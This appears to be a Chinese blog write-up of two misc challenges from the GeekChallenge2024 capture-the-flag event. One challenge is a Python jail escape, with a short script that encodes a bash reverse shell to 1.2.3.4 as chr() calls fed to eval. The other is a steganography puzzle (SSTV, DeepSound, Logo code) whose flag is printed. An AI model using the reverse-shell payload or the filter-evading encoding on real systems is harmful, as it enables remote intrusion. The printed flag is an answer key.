GeekChallenge2024

WEEK2

MISC

Welcome_jail

python的越狱

exp反弹shell

1
2
3
4
5
6
7
8
exp='__import__("os").system("bash -c \'bash -i >& /dev/tcp/1.2.3.4/777 0>&1\'")'
exp_f='__builtins__.__dict__[chr(101)+chr(118)+chr(97)+chr(108)]('
for i in exp:
exp_f += 'chr(' + str(ord(i)) + ')+'
exp_f = exp_f[:-1:]
exp_f += ')'

print(exp_f)

image-20241026205432254

乌龟

先sstv得到密码

image-20241027163854009

再用deepsound去解密

得到secret.txt,里面是logo代码,用在线解释器去解释

image-20241027163931527

得到flag

SYC{TU3T1E_P4INTING}


GeekChallenge2024
http://www.qetx.top/posts/62190/
作者
Qetx.Jul.27
发布于
2024年10月26日
许可协议